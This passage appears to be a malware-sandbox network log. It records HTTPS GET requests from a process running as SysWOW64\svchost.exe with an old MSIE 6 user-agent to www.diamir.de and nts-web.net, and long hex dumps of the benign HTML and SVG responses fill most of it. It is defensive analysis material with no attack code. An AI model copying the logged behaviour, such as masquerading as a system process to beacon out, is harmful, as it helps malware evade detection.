                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=16c3cc89a3323e0e5863253eb52d604a; path=/
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9NoYXxRWgxU6XUxZPMawjdx6TV23sqXc%2FuZMWV2Ow0xZwnrjmY%2F%2BOtETYnJEeGK9aepsPCdy1rCe%2FaiJHvAlXPHRSTDUbQiE45WimtaG0fT%2FFHdzgBYX52Wxjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76f5aef454d3a-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5827INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  37192.168.2.42127394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5825OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: www.diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5825INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5826INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  38192.168.2.42128749.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5827OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: nts-web.net
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5829INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:35 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 2599149
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                  ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5829INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                  2023-07-27 19:54:35 UTC5845INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                  Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5861INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5877INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                  Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5893INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5893INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                  Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5909INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5925INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                  Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5941INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5957INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5973INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC5989INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC6005INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC6021INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:36 UTC6037INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                  Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
